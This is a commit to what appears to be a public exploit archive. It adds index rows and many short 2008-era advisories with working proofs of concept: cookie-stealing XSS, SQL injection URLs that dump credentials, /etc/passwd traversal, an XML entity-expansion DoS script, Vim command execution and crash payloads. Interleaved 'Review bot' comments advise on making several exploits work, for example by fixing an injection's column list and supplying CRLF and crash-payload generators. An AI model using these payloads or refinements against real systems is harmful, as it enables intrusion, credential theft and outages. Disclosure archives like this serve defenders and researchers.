Updated 03_18_2014

This commit is contained in:
Offensive Security 2014-03-18 04:28:55 +00:00
parent dcd4adfd68
commit 21ed45f856
46 changed files with 889 additions and 0 deletions


@ -29055,3 +29055,48 @@ id,file,description,date,author,platform,type,port
32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0
32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0
32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0
32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0
32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 'index.php' Local File Include Vulnerability",2008-08-21,"Beenu Arora",php,webapps,0
32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0
32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0
32290,platforms/php/webapps/32290.txt,"Accellion File Transfer Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0
32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0
32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service Vulnerability",2008-08-23,"Luka Treiber",linux,dos,0
32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0
32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0
32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0
32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0
32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 'surveyresults.asp' Cross Site Scripting Vulnerability",2008-08-26,"Bug Researchers Group",asp,webapps,0
32298,platforms/php/webapps/32298.txt,"HP System Management Homepage (SMH) <= 2.1.12 'message.php' Cross Site Scripting Vulnerability",2008-08-26,"Luca Carettoni",php,webapps,0
32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 'admin/login.php' Cross Site Scripting Vulnerability",2008-08-26,"Sam Georgiou",php,webapps,0
32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 'search.asp' Cross-Site Scripting Vulnerability",2008-08-26,JoCk3r,asp,webapps,0
32301,platforms/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 File Transfer Directory Traversal Vulnerability",2008-08-26,"Seth Fogie",windows,remote,0
32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 'adv_cat.php' Cross-Site Scripting Vulnerability",2008-08-27,"Bug Researchers Group",php,webapps,0
32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 'System.Web' HTTP Header Injection Vulnerability",2008-08-20,"Juraj Skripsky",linux,remote,0
32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 Directory Server Crafted Search Pattern Denial of Service Vulnerability",2008-08-27,"Ulf Weltman",linux,dos,0
32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service Vulnerability",2008-08-29,"Marc Ruef",hardware,dos,0
32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0
32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0
32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting Vulnerability",2008-09-01,sl4xUz,php,webapps,0
32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0
32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 'APPEND' Command Remote Denial of Service Vulnerability",2008-09-02,Antunes,multiple,dos,0
32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 Malformed 'title' Tag Remote Denial of Service Vulnerability",2008-09-02,Exodus,multiple,dos,0
32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 'page' Parameter Cross-Site Scripting Vulnerability",2008-09-02,Am!r,php,webapps,0
32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 user_admin.php user_id Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 'page' Parameter SQL Injection Vulnerability",2008-09-03,e.wiZz!,php,webapps,0
32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0
32318,platforms/php/webapps/32318.txt,"XRMS 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass/CSRF Vulnerabilities",2014-03-17,"TN CYB3R",php,webapps,0
32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32322,platforms/php/webapps/32322.txt,"XRMS 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32323,platforms/php/webapps/32323.txt,"XRMS 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32324,platforms/php/webapps/32324.txt,"XRMS 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32325,platforms/php/webapps/32325.txt,"XRMS 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32326,platforms/php/webapps/32326.txt,"XRMS 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
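Review bot: Several new index rows disagree with the advisory bodies added in the same commit — row 32289 says `Vim <= 7.1.314` while its text states "Versions prior to Vim 7.2.010 are vulnerable", and row 32304 says `Red Hat 8/9 Directory Server` while its text says 7.1 and 8 are affected; one side of each pair should be corrected. The XRMS rows 32320–32326 use `some.php` as the script name, which reads as a placeholder left in the title rather than a real path. The `port` column is 0 for every remote/dos row even where the PoC pins a service, e.g. the Fujitsu 32286 request carries `Host: www.example.com:8081`; filling it in would help anyone filtering the index by service. Judging by the hunk header's old-side count of 3, the first three rows (32280–32282) are context rather than additions, so the new content starts at 32283.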



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30841/info
Smart Survey is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Smart Survey 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30849/info
ASP Search Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ASP Search Engine 1.5.6 is vulnerable; other versions may also be affected.
http://www.example.com/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script>


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30919/info
Dreambox is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected device, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Dreambox DM500C is vulnerable; other models may also be affected.
open|send GET http://www.example.com/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *
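Review bot: The request elides the crashing URI as `aaa(...)`, so the length that actually triggers the crash cannot be recovered from this file; a sentence giving the byte count, or a generator such as `python -c "print('GET /' + 'a'*N + ' HTTP/1.0\r\n\r\n')"` with N stated, would make it reproducible. The `open|send …|sleep|close|pattern_not_exists` syntax looks like a scanner plugin script rather than a raw HTTP exchange, and the file should name the tool so readers know how to run it. The closing `pattern_not_exists HTTP/1.# ### *` appears to match any HTTP status line, so the check is "no response at all after the request" — worth spelling out, since a slow but alive device would also fail it.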

30
platforms/linux/dos/32292.rb Executable file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/30802/info
Ruby is prone to a remote denial-of-service vulnerability in its REXML module.
Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.
Versions up to and including Ruby 1.9.0-3 are vulnerable.
#!/usr/bin/env ruby
require 'rexml/document'
doc = REXML::Document.new(<<END)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
END
puts doc.root.text.size
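Review bot: The script gives no indication of how large the expansion is, and running it is itself a denial of service against the host that runs it; a header comment such as `# 6 nesting levels x10 -> ~10^6 copies of a 30-byte string (~30 MB); run under ulimit -v` would keep a reader from launching it on a shared machine. As far as I recall, REXML substitutes entities when a text value is read rather than at parse time, so the final `puts doc.root.text.size` is the line that actually triggers the blow-up — worth a comment, since timing only `REXML::Document.new` would suggest the parser is unaffected. On interpreters carrying the fix, the same access should raise once the expansion exceeds REXML's entity-expansion limit, so a one-line note would let the script double as a patch check.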

12
platforms/linux/dos/32304.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/30871/info
Red Hat Directory Server is prone to a denial-of-service vulnerability because the server fails to handle specially crafted search patterns.
An attacker can exploit this issue to consume CPU resources with one search request, effectively blocking additional search requests from executing. Legitimate users may be prevented from authenticating to network resources that use the affected server for authentication.
Red Hat Directory Server 7.1 and 8 are affected.
The following example regular expressions are available:
2.6/AV:N/AC:H/Au:N/C:N/I:N/A:P
4.0/AV:N/AC:L/Au:S/C:N/I:N/A:P
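Review bot: `2.6/AV:N/AC:H/Au:N/C:N/I:N/A:P` and `4.0/AV:N/AC:L/Au:S/C:N/I:N/A:P` are CVSS v2 base vectors with their scores, not the "example regular expressions" the preceding sentence promises, so the search pattern that exhausts the server is missing from this entry. The file should say so explicitly, e.g. `NOTE: no trigger pattern is reproduced here; the two lines below are CVSS 2 vectors copied from the original advisory`, rather than leaving readers to try them as LDAP filters. The second vector's `Au:S` also implies an authenticated variant, which the prose above does not mention.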


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/30780/info
Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected.
The following example is available:
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: www.example.com:8081
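Review bot: The traversal is written as repeated `/.././` rather than plain `../`, which suggests a filter on contiguous `../` is being sidestepped, but the file never says so; a short comment on why this form is used would help anyone adapting the request to another path. The PoC also pins the service to port 8081 through the `Host:` header, which the prose does not mention and the index row records as port 0 — either the prose or the row should carry the port.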


@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/30795/info
Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
Versions prior to Vim 7.2.010 are vulnerable.
Copy-and-paste these examples into separate files:
;xclock
vim: set iskeyword=;,@
Place your cursor on ``xclock'', and press K. xclock appears.
;date>>pwned
vim: set iskeyword=1-255
Place your cursor on ``date'' and press K. File ``pwned'' is created in
the current working directory.
Please note: If modeline processing is disabled, set the 'iskeyword'
option manually.
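Review bot: "Versions prior to Vim 7.2.010 are vulnerable" disagrees with the index row for this entry (`Vim <= 7.1.314`); naming the patch level here and fixing the row would remove the ambiguity. The examples work because `K` runs 'keywordprg' (the `man` default, as far as I know) on the unquoted word under the cursor after 'iskeyword' has been widened to include `;`, and that mechanism deserves one sentence so readers see why `iskeyword=;,@` and `iskeyword=1-255` are the essential parts. The closing note about disabled modeline processing should add that 'modeline' is off by default for root, so the two files alone are not sufficient in that case.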


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30867/info
Mono is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input.
By inserting arbitrary headers into an HTTP response, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTTP-request-smuggling, and other attacks.
This issue affects Mono 2.0 and earlier.
<script runat="server"> void Page_Load(object o, EventArgs e) { // Query parameter text is not checked before saving in user cookie NameValueCollection request = Request.QueryString; // Adding cookies to the response Response.Cookies["userName"].Value = request["text"]; } </script>
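Review bot: The snippet shows the vulnerable pattern — `Response.Cookies["userName"].Value = request["text"]` copies a query parameter straight into a `Set-Cookie` header — but no request demonstrating the injection is given; a trigger such as `?text=x%0d%0aX-Injected:%20y` (CRLF inside the parameter) would show what "inject arbitrary HTTP headers" means here, assuming, as the prose implies, that the fix is to reject CR/LF in header values. If the file really is one line as rendered, the `// Query parameter text is not checked …` comment swallows the rest of `Page_Load`, so it should be re-broken into lines or switched to `/* */` comments.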


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30970/info
Softalk Mail Server is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Softalk Mail Server 8.5.1 is vulnerable; other versions may also be affected.
APPEND Ax5000 (UIDNEXT MESSAGES)
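Review bot: `APPEND Ax5000 (UIDNEXT MESSAGES)` uses shorthand the file never defines — `Ax5000` presumably means 5000 `A` characters — and omits the command tag an IMAP server expects (e.g. `a001 APPEND …`), so it cannot be pasted as-is. If this is IMAP, as APPEND and UIDNEXT suggest, APPEND is only valid in the authenticated state, so the prose should say whether a login is required; that decides whether this is a pre-auth crash. A generator such as `printf 'a001 APPEND %s (UIDNEXT MESSAGES)\r\n' "$(head -c 5000 /dev/zero | tr '\0' A)"` would make the test reproducible.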


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30975/info
Google Chrome is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.
Attackers can exploit this issue to make the application unresponsive, denying service to legitimate users.
Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected.
NOTE: Reports indicate that this issue may not be exploitable as described and may depend on a particular WebKit configuration.
<!-- Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit Exploit written by Exodus. http://www.blackhat.org.il http://www.blackhat.org.il/index.php/ready-set-chrome/ http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html --> <HTML> <HEAD> <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE> <SCRIPT language="JavaScript"> function buff(len) { var buffer; for(var i = 0; i != len; i++) { buffer += 'E';} return buffer; } </SCRIPT> </HEAD> <SCRIPT> document.write('<body title=\"' + buff(31337) + '\">'); </SCRIPT> </BODY> </HTML>
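Review bot: The payload is a 31337-character `title` attribute on `<body>`, while the index row calls this "Malformed 'title' Tag"; one of the two is mislabelled, since the `<TITLE>` element in the page is just an ordinary page title. In `buff()`, `var buffer;` is never initialised, so the returned string starts with the text `undefined`; `var buffer = '';` gives the intended run of `E`s. The markup is also collapsed onto one line, and the `<body>` opened by `document.write` has no matching structure visible, so the file would read better re-broken into lines.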


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30772/info
DXShopCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DXShopCart 4.30mc is vulnerable; other versions may also be affected.
http://www.example.com.com/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
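Review bot: The host is `http://www.example.com.com/`, a doubled `.com` that breaks the URL for anyone substituting their target by search-and-replace on `example.com`. The UNION ends in a bare `--`; MySQL only honours `--` as a comment when whitespace follows, so depending on what the application appends to the query `--+` or `--%20` may be needed, and the file should note which form was tested.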


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30774/info
Simasy CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com.com/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/*
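Review bot: The column list ends `…,22,2 3+from+users/*`, where the space inside `2 3` breaks the 23rd column; it should read `22,23+from+users/*`. The host is also written `www.example.com.com`. Unlike the neighbouring entries the prose names no affected version, so a line such as `Version: not stated in the original report` would at least make the gap explicit.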


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30777/info
vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.
--></script><script>alert(/xss/.source)</script><!--
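Review bot: The PoC is only the payload `--></script><script>alert(/xss/.source)</script><!--` with no statement of where it goes; the index row names the `$newpm[title]` parameter, which suggests a private-message title, but that belongs in the file so it stands alone. The leading `-->` and trailing `<!--` show the payload is built to break out of an HTML comment inside a script block, and one sentence saying so would explain why a plain `<script>` payload is not enough.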


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30781/info
FAR-PHP is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
http://www.example.com/farver/index.php?c=/../../../../../../../../boot.ini%00
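Review bot: The trailing `%00` in `c=/../../../../../../../../boot.ini%00` relies on null-byte truncation of the include path, which PHP stopped allowing in 5.3.4, so the file should state that the PoC only applies to older interpreters. The leading `/` before the first `../` and the `boot.ini` target imply the parameter is concatenated onto a base directory on a Windows host; a `../../etc/passwd%00` companion line would cover the Unix case.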

10
platforms/php/webapps/32288.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30789/info
TimeTrex is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TimeTrex versions 2.2.12 and previous are vulnerable.
http://www.example.com/interface/Login.php?user_name=admin&password=XSS
http://www.example.com/interface/Login.php?user_name=XSS

10
platforms/php/webapps/32290.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30796/info
Accellion File Transfer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Accellion File Transfer FTA_7_0_135 is vulnerable; prior versions may also be affected.
https://www.example.com/courier/forgot_password.html/>"><script>alert(document.cookie)</script>
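Review bot: The injection point is the URL path after `forgot_password.html/` (`/>"><script>…`), not a query parameter, and the file should say so: detection rules and fixes that only inspect query-string values will miss it. The prose promises multiple cross-site scripting issues but only this single vector is given, so the others should be listed or marked as not reproduced.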


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30798/info
Photo Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Photo Cart 3.9 is vulnerable; other versions may also be affected.
POST <script>alert(document.cookie)</script> to "Gallery or event name" field
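Review bot: The PoC says to POST the payload into the "Gallery or event name" field, while the index row titles this a "Search" cross-site scripting issue, so the two disagree about the affected input and one should be corrected. The file also does not name the script or form that receives the POST, so a reader cannot locate the field without the application in front of them; a line such as `Form: <admin page> — field "Gallery or event name"` with the real path would fix that.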


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30804/info
One-News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and multiple HTML-injection issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Beta 2 of One-News is prone to these issues.
http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30822/info
PHP-Ultimate Webboard is prone multiple-input validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Successful exploits will allow unauthorized attackers to delete arbitrary questions and answers. Attackers may also exploit these issues to perform SQL-injection attacks.
PHP-Ultimate Webboard 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM]
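Review bot: `admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM]` demonstrates a missing authorisation check on an admin script — any request deletes a post — which is a different class from the "input validation" framing in the prose and the index title; if no login was needed when this was observed, the file should say so explicitly. The SQL-injection claim in the prose has no vector at all, so either one should be given or it should be marked as unverified.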


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30827/info
Bluemoon inc. PopnupBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PopnupBlog 3.30 is affected; other versions may also be vulnerable.
http://www.example.com/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30846/info
HP System Management Homepage (SMH) is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
NOTE: This issue may stem from an incomplete fix for the issues discussed in BIDs 24256 (HP System Management Homepage (SMH) Unspecified Cross Site Scripting Vulnerability) and 25953 (HP System Management Homepage (SMH) for Linux, Windows, and HP-UX Cross Site Scripting Vulnerability), but Symantec has not confirmed this.
1st vector) https://www.example.com/message.php?<script><script>alert('xss')</script></script> 2nd vector) https://www.example.com/message.php?aa%00<script><script>alert('xss')</script></script> 3rd vector) https://www.example.com/message.php?aa<BGSOUND SRC="javascript:alert('XSS');">
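Review bot: The three vectors are run together on one line with "1st vector)" labels, which makes them hard to copy; one URL per line would be clearer. The third vector relies on `<BGSOUND SRC="javascript:…">`, which as far as I know only Internet Explorer honours, so it should be marked browser-specific. Vector 2 differs from vector 1 only by the `aa%00` prefix and the file does not say why the null byte matters, so a one-line comment on what it bypasses would help.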


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30848/info
MatterDaddy Market is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MatterDaddy Market 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/dir(s)/admin/login.php?msg=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30864/info
AbleSpace is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects AbleSpace 1.0 and earlier.
http://www.example.com/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0

11
platforms/php/webapps/32306.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30924/info
dotProject is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dotProject 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?m=tasks&inactive=toggle"> http://www.example.com/index.php?m=calendar&a=day_view&date=20080828"> http://www.example.com/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> http://www.example.com/index.php?m=ticketsmith&type=My'> http://www.example.com/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--
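Review bot: Five vectors are run together on one line, and the first four stop at the breakout prefix (`">` / `'>`) with no payload, so a reader has to guess both where each URL ends and what to append. The SQL vector ends in a bare `--`; MySQL treats `--` as a comment only when followed by whitespace, so `--+` or `--%20` is the safer form to record unless it was tested as written. The prose describes a single SQL-injection issue while the index title says "Multiple SQL Injection", which should be reconciled.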

11
platforms/php/webapps/32307.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30951/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30957/info
GenPortal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/buscarCat.php?palBuscar=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30962/info
Full PHP Emlak Script is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
